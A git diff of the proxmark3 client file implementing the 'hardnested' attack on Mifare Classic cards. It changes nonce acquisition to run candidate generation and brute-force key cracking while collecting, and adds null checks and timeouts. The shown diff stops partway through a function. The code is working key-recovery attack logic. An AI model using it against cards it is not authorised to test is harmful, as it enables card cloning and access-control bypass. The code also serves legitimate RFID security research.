X-Git-Url: https://git.zerfleddert.de/cgi-bin/gitweb.cgi/proxmark3-svn/blobdiff_plain/3130ba4b2168f8e8dd66f214d1eecdca65708d53..de39bf505ab3a2f4166e858cc448e3ef45b7092f:/client/cmdhfmfhard.c?ds=sidebyside

diff --git a/client/cmdhfmfhard.c b/client/cmdhfmfhard.c
index 5b9a6494..3fed7c95 100644
--- a/client/cmdhfmfhard.c
+++ b/client/cmdhfmfhard.c
@@ -1,6 +1,7 @@
 //-----------------------------------------------------------------------------
 // Copyright (C) 2015 piwi
 // fiddled with 2016 Azcid (hardnested bitsliced Bruteforce imp)
+// fiddled with 2016 Matrix ( sub testing of nonces while collecting )
 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
 // at your option, any later version. See the LICENSE.txt file for the text of
 // the license.
@@ -13,31 +14,16 @@
 //   Mifare Classic Cards" in Proceedings of the 22nd ACM SIGSAC Conference on 
 //   Computer and Communications Security, 2015
 //-----------------------------------------------------------------------------
-
-#include <stdlib.h> 
-#include <stdio.h>
-#include <string.h>
-#include <pthread.h>
-#include <locale.h>
-#include <math.h>
-#include "proxmark3.h"
-#include "cmdmain.h"
-#include "ui.h"
-#include "util.h"
-#include "nonce2key/crapto1.h"
-#include "nonce2key/crypto1_bs.h"
-#include "parity.h"
-#ifdef __WIN32
-	#include <windows.h>
-#endif
-#include <malloc.h>
-#include <assert.h>
-
-// uint32_t test_state_odd = 0;
-// uint32_t test_state_even = 0;
+#include "cmdhfmfhard.h"
+#include "cmdhw.h"
 
 #define CONFIDENCE_THRESHOLD	0.95		// Collect nonces until we are certain enough that the following brute force is successfull
-#define GOOD_BYTES_REQUIRED		28
+#define GOOD_BYTES_REQUIRED	13		// default 28, could be smaller == faster
+#define NONCES_THRESHOLD	5000		// every N nonces check if we can crack the key
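+#define CRACKING_THRESHOLD	36.0f //38.50f		// log2 of the number of remaining candidate keys; brute force is attempted once the estimate drops below this (i.e. fewer than 2^36 keys)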
+#define MAX_BUCKETS		128
+
+#define END_OF_LIST_MARKER		0xFFFFFFFF
 
 static const float p_K[257] = {		// the probability that a random nonce has a Sum Property == K 
 	0.0290, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 
@@ -73,7 +59,6 @@ static const float p_K[257] = {		// the probability that a random nonce has a Su
 	0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000,
 	0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000,
 	0.0290 };
-
 		
 typedef struct noncelistentry {
 	uint32_t nonce_enc;
@@ -89,10 +74,10 @@ typedef struct noncelist {
 	float Sum8_prob;
 	bool updated;
 	noncelistentry_t *first;
-	float score1, score2;
+	float score1;
+	uint_fast8_t score2;
 } noncelist_t;
 
-
 static size_t nonces_to_bruteforce = 0;
 static noncelistentry_t *brute_force_nonces[256];
 static uint32_t cuid = 0;
@@ -130,9 +115,28 @@ typedef struct {
 
 static partial_indexed_statelist_t partial_statelist[17];
 static partial_indexed_statelist_t statelist_bitflip;
-
 static statelist_t *candidates = NULL;
 
+bool field_off = false;
+
+uint64_t foundkey = 0;
+size_t keys_found = 0;
+size_t bucket_count = 0;
+statelist_t* buckets[MAX_BUCKETS];
+static uint64_t total_states_tested = 0;
+size_t thread_count = 4;
+
+// these bitsliced states will hold identical states in all slices
+bitslice_t bitsliced_rollback_byte[ROLLBACK_SIZE];
+
+// arrays of bitsliced states with identical values in all slices
+bitslice_t bitsliced_encrypted_nonces[NONCE_TESTS][STATE_SIZE];
+bitslice_t bitsliced_encrypted_parity_bits[NONCE_TESTS][ROLLBACK_SIZE];
+
+#define EXACT_COUNT
+
+static bool generate_candidates(uint16_t, uint16_t);
+static bool brute_force(void);
 
 static int add_nonce(uint32_t nonce_enc, uint8_t par_enc) 
 {
@@ -161,14 +165,17 @@ static int add_nonce(uint32_t nonce_enc, uint8_t par_enc)
 		} else {					// add new entry at end of existing list.
 			p2 = p2->next = malloc(sizeof(noncelistentry_t));
 		}
-	} else if ((p1->nonce_enc & 0x00ff0000) != (nonce_enc & 0x00ff0000)) {				// found distinct 2nd byte. Need to insert.
+		if (p2 == NULL) return 0;							// memory allocation failed
+	}
+	else if ((p1->nonce_enc & 0x00ff0000) != (nonce_enc & 0x00ff0000)) {			// found distinct 2nd byte. Need to insert.
 		if (p2 == NULL) {			// need to insert at start of list
 			p2 = nonces[first_byte].first = malloc(sizeof(noncelistentry_t));
 		} else {
 			p2 = p2->next = malloc(sizeof(noncelistentry_t));
 		}
-	} else {											// we have seen this 2nd byte before. Nothing to add or insert. 
-		return (0);
+		if (p2 == NULL) return 0;							// memory allocation failed
+	} else {
+		return 0;									// we have seen this 2nd byte before. Nothing to add or insert.
 	}
 
 	// add or insert new data
@@ -185,7 +192,7 @@ static int add_nonce(uint32_t nonce_enc, uint8_t par_enc)
 	nonces[first_byte].Sum += evenparity32((nonce_enc & 0x00ff0000) | (par_enc & 0x04));
 	nonces[first_byte].updated = true;   // indicates that we need to recalculate the Sum(a8) probability for this first byte
 
-	return (1);				// new nonce added
+	return 1;				// new nonce added
 }
 
 static void init_nonce_memory(void)
@@ -203,7 +210,6 @@ static void init_nonce_memory(void)
 	num_good_first_bytes = 0;
 }
 
-
 static void free_nonce_list(noncelistentry_t *p)
 {
 	if (p == NULL) {
@@ -296,17 +302,19 @@ static float sum_probability(uint16_t K, uint16_t n, uint16_t k)
 	if (k > K || p_K[K] == 0.0) return 0.0;
 
 	double p_T_is_k_when_S_is_K = p_hypergeometric(N, K, n, k);
+	if (p_T_is_k_when_S_is_K == 0.0) return 0.0;
+
 	double p_S_is_K = p_K[K];
-	double p_T_is_k = 0;
+	double p_T_is_k = 0.0;
 	for (uint16_t i = 0; i <= 256; i++) {
 		if (p_K[i] != 0.0) {
 			p_T_is_k += p_K[i] * p_hypergeometric(N, i, n, k);
 		}
 	}
+	if (p_T_is_k == 0.0) return 0.0;
 	return(p_T_is_k_when_S_is_K * p_S_is_K / p_T_is_k);
 }
 
-	
 static inline uint_fast8_t common_bits(uint_fast8_t bytes_diff) 
 {
 	static const uint_fast8_t common_bits_LUT[256] = {
@@ -448,32 +456,31 @@ static void Tests()
 	// crypto1_destroy(pcs);
 
 	
-	
 	// printf("\nTests: number of states with BitFlipProperty: %d, (= %1.3f%% of total states)\n", statelist_bitflip.len[0], 100.0 * statelist_bitflip.len[0] / (1<<20));
 
-	printf("\nTests: Actual BitFlipProperties odd/even:\n");
-	for (uint16_t i = 0; i < 256; i++) {
-		printf("[%02x]:%c  ", i, nonces[i].BitFlip[ODD_STATE]?'o':nonces[i].BitFlip[EVEN_STATE]?'e':' ');
-		if (i % 8 == 7) {
-			printf("\n");
-		}
-	}
+	// printf("\nTests: Actual BitFlipProperties odd/even:\n");
+	// for (uint16_t i = 0; i < 256; i++) {
+		// printf("[%02x]:%c  ", i, nonces[i].BitFlip[ODD_STATE]?'o':nonces[i].BitFlip[EVEN_STATE]?'e':' ');
+		// if (i % 8 == 7) {
+			// printf("\n");
+		// }
+	// }
 	
-	printf("\nTests: Sorted First Bytes:\n");
-	for (uint16_t i = 0; i < 256; i++) {
-		uint8_t best_byte = best_first_bytes[i];
-		printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c\n", 
-		//printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c, score1: %1.5f, score2: %1.0f\n", 
-			i, best_byte, 
-			nonces[best_byte].num,
-			nonces[best_byte].Sum,
-			nonces[best_byte].Sum8_guess,
-			nonces[best_byte].Sum8_prob * 100,
-			nonces[best_byte].BitFlip[ODD_STATE]?'o':nonces[best_byte].BitFlip[EVEN_STATE]?'e':' '
-			//nonces[best_byte].score1,
-			//nonces[best_byte].score2
-			);
-	}
+	// printf("\nTests: Sorted First Bytes:\n");
+	// for (uint16_t i = 0; i < 256; i++) {
+		// uint8_t best_byte = best_first_bytes[i];
+		// printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c\n", 
+		// //printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c, score1: %1.5f, score2: %1.0f\n", 
+			// i, best_byte, 
+			// nonces[best_byte].num,
+			// nonces[best_byte].Sum,
+			// nonces[best_byte].Sum8_guess,
+			// nonces[best_byte].Sum8_prob * 100,
+			// nonces[best_byte].BitFlip[ODD_STATE]?'o':nonces[best_byte].BitFlip[EVEN_STATE]?'e':' '
+			// //nonces[best_byte].score1,
+			// //nonces[best_byte].score2
+			// );
+	// }
 	
 	// printf("\nTests: parity performance\n");
 	// time_t time1p = clock();
@@ -493,7 +500,7 @@ static void Tests()
 
 }
 
-static void sort_best_first_bytes(void)
+static uint16_t sort_best_first_bytes(void)
 {
 	// sort based on probability for correct guess	
 	for (uint16_t i = 0; i < 256; i++ ) {
@@ -508,8 +515,8 @@ static void sort_best_first_bytes(void)
 				best_first_bytes[k] = best_first_bytes[k-1];
 			}
 		}
-			best_first_bytes[j] = i;
-		}
+		best_first_bytes[j] = i;
+	}
 
 	// determine how many are above the CONFIDENCE_THRESHOLD
 	uint16_t num_good_nonces = 0;
@@ -519,6 +526,8 @@ static void sort_best_first_bytes(void)
 		}
 	}
 	
+	if (num_good_nonces == 0) return 0;
+
 	uint16_t best_first_byte = 0;
 
 	// select the best possible first byte based on number of common bits with all {b'}
@@ -541,25 +550,28 @@ static void sort_best_first_bytes(void)
 	for (uint16_t i = 0; i < num_good_nonces; i++ ) {
 		uint16_t sum8 = nonces[best_first_bytes[i]].Sum8_guess;
 		float bitflip_prob = 1.0;
-		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE]) {
+		
+		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE])
 			bitflip_prob = 0.09375;
-		}
+		
 		nonces[best_first_bytes[i]].score1 = p_K[sum8] * bitflip_prob;
-		if (p_K[sum8] * bitflip_prob <= min_p_K) {
+		
+		if (p_K[sum8] * bitflip_prob <= min_p_K)
 			min_p_K = p_K[sum8] * bitflip_prob;
-		}
+		
 	}
 
 
 	// use number of commmon bits as a tie breaker
-	uint16_t max_common_bits = 0;
+	uint_fast8_t max_common_bits = 0;
 	for (uint16_t i = 0; i < num_good_nonces; i++) {
+
 		float bitflip_prob = 1.0;
-		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE]) {
+		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE])
 			bitflip_prob = 0.09375;
-		}
+		
 		if (p_K[nonces[best_first_bytes[i]].Sum8_guess] * bitflip_prob == min_p_K) {
-			uint16_t sum_common_bits = 0;
+			uint_fast8_t sum_common_bits = 0;
 			for (uint16_t j = 0; j < num_good_nonces; j++) {
 				sum_common_bits += common_bits(best_first_bytes[i] ^ best_first_bytes[j]);
 			}
@@ -572,15 +584,17 @@ static void sort_best_first_bytes(void)
 	}	
 
 	// swap best possible first byte to the pole position
-	uint16_t temp = best_first_bytes[0];
-	best_first_bytes[0] = best_first_bytes[best_first_byte];
-	best_first_bytes[best_first_byte] = temp;
+	if (best_first_byte != 0) {
+		uint16_t temp = best_first_bytes[0];
+		best_first_bytes[0] = best_first_bytes[best_first_byte];
+		best_first_bytes[best_first_byte] = temp;
+	}
 	
+	return num_good_nonces;
 }
 
 static uint16_t estimate_second_byte_sum(void) 
-{
-	
+{	
 	for (uint16_t first_byte = 0; first_byte < 256; first_byte++) {
 		float Sum8_prob = 0.0;
 		uint16_t Sum8 = 0;
@@ -597,27 +611,17 @@ static uint16_t estimate_second_byte_sum(void)
 			nonces[first_byte].updated = false;
 		}
 	}
-	
-	sort_best_first_bytes();
-
-	uint16_t num_good_nonces = 0;
-	for (uint16_t i = 0; i < 256; i++) {
-		if (nonces[best_first_bytes[i]].Sum8_prob >= CONFIDENCE_THRESHOLD) {
-			++num_good_nonces;
-		}
-	}
-	
-	return num_good_nonces;
+	return sort_best_first_bytes();
 }	
 
 static int read_nonce_file(void)
 {
 	FILE *fnonces = NULL;
-	uint8_t trgBlockNo;
-	uint8_t trgKeyType;
+	uint8_t trgBlockNo = 0;
+	uint8_t trgKeyType = 0;
 	uint8_t read_buf[9];
-	uint32_t nt_enc1, nt_enc2;
-	uint8_t par_enc;
+	uint32_t nt_enc1 = 0, nt_enc2 = 0;
+	uint8_t par_enc = 0;
 	int total_num_nonces = 0;
 	
 	if ((fnonces = fopen("nonces.bin","rb")) == NULL) { 
@@ -626,6 +630,7 @@ static int read_nonce_file(void)
 	}
 
 	PrintAndLog("Reading nonces from file nonces.bin...");
+	memset (read_buf, 0, sizeof (read_buf));
 	size_t bytes_read = fread(read_buf, 1, 6, fnonces);
 	if ( bytes_read == 0) {
 		PrintAndLog("File reading error.");
@@ -635,8 +640,10 @@ static int read_nonce_file(void)
 	cuid = bytes_to_num(read_buf, 4);
 	trgBlockNo = bytes_to_num(read_buf+4, 1);
 	trgKeyType = bytes_to_num(read_buf+5, 1);
-
-	while (fread(read_buf, 1, 9, fnonces) == 9) {
+	size_t ret = 0;
+	do {
+		memset (read_buf, 0, sizeof (read_buf));
+		if ((ret = fread(read_buf, 1, 9, fnonces)) == 9) {
 		nt_enc1 = bytes_to_num(read_buf, 4);
 		nt_enc2 = bytes_to_num(read_buf+4, 4);
 		par_enc = bytes_to_num(read_buf+8, 1);
@@ -646,16 +653,16 @@ static int read_nonce_file(void)
 		add_nonce(nt_enc2, par_enc & 0x0f);
 		total_num_nonces += 2;
 	}
+	} while (ret == 9);
+
 	fclose(fnonces);
 	PrintAndLog("Read %d nonces from file. cuid=%08x, Block=%d, Keytype=%c", total_num_nonces, cuid, trgBlockNo, trgKeyType==0?'A':'B');
-
 	return 0;
 }
 
 static void Check_for_FilterFlipProperties(void)
 {
 	printf("Checking for Filter Flip Properties...\n");
-
 	uint16_t num_bitflips = 0;
 	
 	for (uint16_t i = 0; i < 256; i++) {
@@ -664,6 +671,8 @@ static void Check_for_FilterFlipProperties(void)
 	}
 	
 	for (uint16_t i = 0; i < 256; i++) {
+		if (!nonces[i].first || !nonces[i^0x80].first || !nonces[i^0x40].first) continue;
+
 		uint8_t parity1 = (nonces[i].first->par_enc) >> 3;				// parity of first byte
 		uint8_t parity2_odd = (nonces[i^0x80].first->par_enc) >> 3;  	// XOR 0x80 = last bit flipped
 		uint8_t parity2_even = (nonces[i^0x40].first->par_enc) >> 3;	// XOR 0x40 = second last bit flipped
@@ -677,9 +686,8 @@ static void Check_for_FilterFlipProperties(void)
 		}
 	}
 	
-	if (write_stats) {
+	if (write_stats)
 		fprintf(fstats, "%d;", num_bitflips);
-	}
 }
 
 static void simulate_MFplus_RNG(uint32_t test_cuid, uint64_t test_key, uint32_t *nt_enc, uint8_t *par_enc)
@@ -736,8 +744,8 @@ static void simulate_acquire_nonces()
 			num_good_first_bytes = estimate_second_byte_sum();
 			if (total_num_nonces > next_fivehundred) {
 				next_fivehundred = (total_num_nonces/500+1) * 500;
-				printf("Acquired %5d nonces (%5d with distinct bytes 0 and 1). Number of bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
-					total_num_nonces, 
+				printf("Acquired %5d nonces (%5d with distinct bytes 0,1). Bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
+					total_num_nonces,
 					total_added_nonces,
 					CONFIDENCE_THRESHOLD * 100.0,
 					num_good_first_bytes);
@@ -761,7 +769,6 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 {
 	clock_t time1 = clock();
 	bool initialize = true;
-	bool field_off = false;
 	bool finished = false;
 	bool filter_flip_checked = false;
 	uint32_t flags = 0;
@@ -769,116 +776,124 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 	uint32_t total_num_nonces = 0;
 	uint32_t next_fivehundred = 500;
 	uint32_t total_added_nonces = 0;
+	uint32_t idx = 1;
+	uint32_t timeout  = 0;
 	FILE *fnonces = NULL;
+	field_off = false;
 	UsbCommand resp;
-
+	UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {0,0,0} };
+	memcpy(c.d.asBytes, key, 6);	
+	c.arg[0] = blockNo + (keyType * 0x100);
+	c.arg[1] = trgBlockNo + (trgKeyType * 0x100);
+		
 	printf("Acquiring nonces...\n");
-	
-	clearCommandBuffer();
-
 	do {
+	
 		flags = 0;
 		flags |= initialize ? 0x0001 : 0;
 		flags |= slow ? 0x0002 : 0;
 		flags |= field_off ? 0x0004 : 0;
-		UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {blockNo + keyType * 0x100, trgBlockNo + trgKeyType * 0x100, flags}};
-		memcpy(c.d.asBytes, key, 6);
+		c.arg[2] = flags;
 
+		clearCommandBuffer();
 		SendCommand(&c);
 		
-		if (field_off) finished = true;
-		
-		if (initialize) {
-			if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) return 1;
-			if (resp.arg[0]) return resp.arg[0];  // error during nested_hard
+		if (field_off) break;
+
+		while(!WaitForResponseTimeout(CMD_ACK, &resp, 2000)) {
+			timeout++;
+			printf(".");
+			if (timeout > 3) {
+				PrintAndLog("\nNo response from Proxmark. Aborting...");
+				if (fnonces) fclose(fnonces);
+				return 1;
+			}
+		}		
 
+		if (resp.arg[0]) {
+			if (fnonces) fclose(fnonces);
+			return resp.arg[0];  // error during nested_hard
+		}
+			
+		if (initialize) {
+			// global var CUID
 			cuid = resp.arg[1];
-			// PrintAndLog("Acquiring nonces for CUID 0x%08x", cuid); 
 			if (nonce_file_write && fnonces == NULL) {
 				if ((fnonces = fopen("nonces.bin","wb")) == NULL) { 
 					PrintAndLog("Could not create file nonces.bin");
 					return 3;
 				}
 				PrintAndLog("Writing acquired nonces to binary file nonces.bin");
+				memset (write_buf, 0, sizeof (write_buf));
 				num_to_bytes(cuid, 4, write_buf);
 				fwrite(write_buf, 1, 4, fnonces);
 				fwrite(&trgBlockNo, 1, 1, fnonces);
 				fwrite(&trgKeyType, 1, 1, fnonces);
+				fflush(fnonces);
 			}
+			initialize = false;			
 		}
-
-		if (!initialize) {
-			uint32_t nt_enc1, nt_enc2;
-			uint8_t par_enc;
-			uint16_t num_acquired_nonces = resp.arg[2];
-			uint8_t *bufp = resp.d.asBytes;
-			for (uint16_t i = 0; i < num_acquired_nonces; i+=2) {
-				nt_enc1 = bytes_to_num(bufp, 4);
-				nt_enc2 = bytes_to_num(bufp+4, 4);
-				par_enc = bytes_to_num(bufp+8, 1);
-				
-				//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc1, par_enc >> 4);
-				total_added_nonces += add_nonce(nt_enc1, par_enc >> 4);
-				//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc2, par_enc & 0x0f);
-				total_added_nonces += add_nonce(nt_enc2, par_enc & 0x0f);
-				
-
-				if (nonce_file_write) {
-					fwrite(bufp, 1, 9, fnonces);
-				}
-				
-				bufp += 9;
+		
+		uint32_t nt_enc1, nt_enc2;
+		uint8_t par_enc;
+		uint16_t num_acquired_nonces = resp.arg[2];
+		uint8_t *bufp = resp.d.asBytes;
+		for (uint16_t i = 0; i < num_acquired_nonces; i += 2) {
+			nt_enc1 = bytes_to_num(bufp, 4);
+			nt_enc2 = bytes_to_num(bufp+4, 4);
+			par_enc = bytes_to_num(bufp+8, 1);
+			
+			total_added_nonces += add_nonce(nt_enc1, par_enc >> 4);
+			total_added_nonces += add_nonce(nt_enc2, par_enc & 0x0f);
+			
+			if (nonce_file_write && fnonces) {
+				fwrite(bufp, 1, 9, fnonces);
+				fflush(fnonces);
 			}
-
-			total_num_nonces += num_acquired_nonces;
+			bufp += 9;
 		}
-		
-		if (first_byte_num == 256 ) {
-			// printf("first_byte_num = %d, first_byte_Sum = %d\n", first_byte_num, first_byte_Sum);
+		total_num_nonces += num_acquired_nonces;
+
+		if (first_byte_num == 256) {
+
 			if (!filter_flip_checked) {
 				Check_for_FilterFlipProperties();
 				filter_flip_checked = true;
 			}
+
 			num_good_first_bytes = estimate_second_byte_sum();
+
 			if (total_num_nonces > next_fivehundred) {
 				next_fivehundred = (total_num_nonces/500+1) * 500;
-				printf("Acquired %5d nonces (%5d with distinct bytes 0 and 1). Number of bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
-					total_num_nonces, 
+				printf("Acquired %5d nonces (%5d/%5d with distinct bytes 0,1). Bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
+					total_num_nonces,
 					total_added_nonces,
+					NONCES_THRESHOLD * idx,
 					CONFIDENCE_THRESHOLD * 100.0,
-					num_good_first_bytes);
-			}
-			if (num_good_first_bytes >= GOOD_BYTES_REQUIRED) {
-				field_off = true;	// switch off field with next SendCommand and then finish
+					num_good_first_bytes
+					);				
 			}
-		}
-
-		if (!initialize) {
-			if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) {
-				fclose(fnonces);
-				return 1;
-			}
-			if (resp.arg[0]) {
-				fclose(fnonces);
-				return resp.arg[0];  // error during nested_hard
+			
+			if (total_added_nonces >= (NONCES_THRESHOLD * idx)) {
+				if (num_good_first_bytes > 0) {
+					if (generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess) || known_target_key != -1) {
+						field_off = brute_force(); // switch off field with next SendCommand and then finish
+					}
+				}
+				idx++;
 			}
 		}
-
-		initialize = false;
-
 	} while (!finished);
 
-	
-	if (nonce_file_write) {
+	if (nonce_file_write && fnonces)
 		fclose(fnonces);
-	}
 	
 	time1 = clock() - time1;
 	if ( time1 > 0 ) {
-	PrintAndLog("Acquired a total of %d nonces in %1.1f seconds (%0.0f nonces/minute)", 
-		total_num_nonces, 
-		((float)time1)/CLOCKS_PER_SEC, 
-		total_num_nonces * 60.0 * CLOCKS_PER_SEC/(float)time1
+		PrintAndLog("Acquired a total of %d nonces in %1.1f seconds (%0.0f nonces/minute)", 
+			total_num_nonces, 
+			((float)time1)/CLOCKS_PER_SEC, 
+			total_num_nonces * 60.0 * CLOCKS_PER_SEC/(float)time1
 		);
 	}
 	return 0;
@@ -887,7 +902,8 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 static int init_partial_statelists(void)
 {
 	const uint32_t sizes_odd[17] = { 126757, 0, 18387, 0, 74241, 0, 181737, 0, 248801, 0, 182033, 0, 73421, 0, 17607, 0, 125601 };
-	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73356, 0, 18127, 0, 126634 };
+//	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73356, 0, 18127, 0, 126634 };
+	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73357, 0, 18127, 0, 126635 };
 	
 	printf("Allocating memory for partial statelists...\n");
 	for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
@@ -927,7 +943,7 @@ static int init_partial_statelists(void)
 		for (uint16_t i = 0; i <= 16; i += 2) {
 			uint32_t *p = partial_statelist[i].states[odd_even];
 			p += partial_statelist[i].len[odd_even];
-			*p = 0xffffffff;
+			*p = END_OF_LIST_MARKER;
 		}
 	}
 	
@@ -953,8 +969,8 @@ static void init_BitFlip_statelist(void)
 	}
 	// set len and add End Of List marker
 	statelist_bitflip.len[0] = p - statelist_bitflip.states[0];
-	*p = 0xffffffff;
-	statelist_bitflip.states[0] = realloc(statelist_bitflip.states[0], sizeof(uint32_t) * (statelist_bitflip.len[0] + 1));
+	*p = END_OF_LIST_MARKER;
+	//statelist_bitflip.states[0] = realloc(statelist_bitflip.states[0], sizeof(uint32_t) * (statelist_bitflip.len[0] + 1));
 }
 		
 static inline uint32_t *find_first_state(uint32_t state, uint32_t mask, partial_indexed_statelist_t *sl, odd_even_t odd_even)
@@ -963,7 +979,7 @@ static inline uint32_t *find_first_state(uint32_t state, uint32_t mask, partial_
 
 	if (p == NULL) return NULL;
 	while (*p < (state & mask)) p++;
-	if (*p == 0xffffffff) return NULL;					// reached end of list, no match
+	if (*p == END_OF_LIST_MARKER) return NULL;					// reached end of list, no match
 	if ((*p & mask) == (state & mask)) return p;		// found a match.
 	return NULL;										// no match
 } 
@@ -1041,7 +1057,7 @@ static bool all_other_first_bytes_match(uint32_t state, odd_even_t odd_even)
 					uint16_t part_sum_a8 = (odd_even == ODD_STATE) ? r : s;
 					uint32_t *p = find_first_state(state, mask, &partial_statelist[part_sum_a8], odd_even);
 					if (p != NULL) {
-						while ((state & mask) == (*p & mask) && (*p != 0xffffffff)) {
+						while ((state & mask) == (*p & mask) && (*p != END_OF_LIST_MARKER)) {
 							if (remaining_bits_match(j, bytes_diff, state, (state&0x00fffff0) | *p, odd_even)) {
 								found_match = true;
 								// if ((odd_even == ODD_STATE && state == test_state_odd)
@@ -1099,7 +1115,7 @@ static bool all_bit_flips_match(uint32_t state, odd_even_t odd_even)
 			bool found_match = false;
 			uint32_t *p = find_first_state(state, mask, &statelist_bitflip, 0);
 			if (p != NULL) {
-				while ((state & mask) == (*p & mask) && (*p != 0xffffffff)) {
+				while ((state & mask) == (*p & mask) && (*p != END_OF_LIST_MARKER)) {
 					if (remaining_bits_match(j, bytes_diff, state, (state&0x00fffff0) | *p, odd_even)) {
 						found_match = true;
 						// if ((odd_even == ODD_STATE && state == test_state_odd)
@@ -1172,11 +1188,11 @@ static int add_matching_states(statelist_t *candidates, uint16_t part_sum_a0, ui
 		return 4;
 	}
 	uint32_t *add_p = candidates->states[odd_even]; 
-	for (uint32_t *p1 = partial_statelist[part_sum_a0].states[odd_even]; *p1 != 0xffffffff; p1++) {
+	for (uint32_t *p1 = partial_statelist[part_sum_a0].states[odd_even]; *p1 != END_OF_LIST_MARKER; p1++) {
 		uint32_t search_mask = 0x000ffff0;
 		uint32_t *p2 = find_first_state((*p1 << 4), search_mask, &partial_statelist[part_sum_a8], odd_even);
-		if (p2 != NULL) {
-			while (((*p1 << 4) & search_mask) == (*p2 & search_mask) && *p2 != 0xffffffff) {
+		if (p1 != NULL && p2 != NULL) {
+			while (((*p1 << 4) & search_mask) == (*p2 & search_mask) && *p2 != END_OF_LIST_MARKER) {
 				if ((nonces[best_first_bytes[0]].BitFlip[odd_even] && find_first_state((*p1 << 4) | *p2, 0x000fffff, &statelist_bitflip, 0))
 					|| !nonces[best_first_bytes[0]].BitFlip[odd_even]) {
 				if (all_other_first_bytes_match((*p1 << 4) | *p2, odd_even)) {
@@ -1191,7 +1207,7 @@ static int add_matching_states(statelist_t *candidates, uint16_t part_sum_a0, ui
 	}
 
 	// set end of list marker and len
-	*add_p = 0xffffffff; 
+	*add_p = END_OF_LIST_MARKER; 
 	candidates->len[odd_even] = add_p - candidates->states[odd_even];
 
 	candidates->states[odd_even] = realloc(candidates->states[odd_even], sizeof(uint32_t) * (candidates->len[odd_even] + 1));
@@ -1213,6 +1229,8 @@ static statelist_t *add_more_candidates(statelist_t *current_candidates)
 	} else {
 		new_candidates = current_candidates->next = (statelist_t *)malloc(sizeof(statelist_t));
 	}
+	if (!new_candidates) return NULL;
+
 	new_candidates->next = NULL;
 	new_candidates->len[ODD_STATE] = 0;
 	new_candidates->len[EVEN_STATE] = 0;
@@ -1221,7 +1239,7 @@ static statelist_t *add_more_candidates(statelist_t *current_candidates)
 	return new_candidates;
 }
 
-static void TestIfKeyExists(uint64_t key)
+static bool TestIfKeyExists(uint64_t key)
 {
 	struct Crypto1State *pcs;
 	pcs = crypto1_create(key);
@@ -1230,48 +1248,53 @@ static void TestIfKeyExists(uint64_t key)
 	uint32_t state_odd = pcs->odd & 0x00ffffff;
 	uint32_t state_even = pcs->even & 0x00ffffff;
 	//printf("Tests: searching for key %llx after first byte 0x%02x (state_odd = 0x%06x, state_even = 0x%06x) ...\n", key, best_first_bytes[0], state_odd, state_even);
-	
+	printf("Validating key search space\n");
 	uint64_t count = 0;
 	for (statelist_t *p = candidates; p != NULL; p = p->next) {
 		bool found_odd = false;
 		bool found_even = false;
 		uint32_t *p_odd = p->states[ODD_STATE];
 		uint32_t *p_even = p->states[EVEN_STATE];
-		while (*p_odd != 0xffffffff) {
+		while (*p_odd != END_OF_LIST_MARKER) {
 			if ((*p_odd & 0x00ffffff) == state_odd) {
 				found_odd = true;
 				break;
 			}
 			p_odd++;
 		}
-		while (*p_even != 0xffffffff) {
-			if ((*p_even & 0x00ffffff) == state_even) {
+		while (*p_even != END_OF_LIST_MARKER) {
+			if ((*p_even & 0x00ffffff) == state_even)
 				found_even = true;
-			}
+
 			p_even++;
 		}
 		count += (p_odd - p->states[ODD_STATE]) * (p_even - p->states[EVEN_STATE]);
 		if (found_odd && found_even) {
-			PrintAndLog("Key Found after testing %lld (2^%1.1f) out of %lld (2^%1.1f) keys. A brute force would have taken approx %lld minutes.", 
-				count, log(count)/log(2), 
-				maximum_states, log(maximum_states)/log(2),
-				(count>>23)/60);
-			if (write_stats) {
-				fprintf(fstats, "1\n");
+			if (known_target_key != -1) {
+				PrintAndLog("Key Found after testing %llu (2^%1.1f) out of %lld (2^%1.1f) keys.", 
+					count,
+					log(count)/log(2), 
+					maximum_states,
+					log(maximum_states)/log(2)
+					);
+				if (write_stats)
+					fprintf(fstats, "1\n");			
 			}
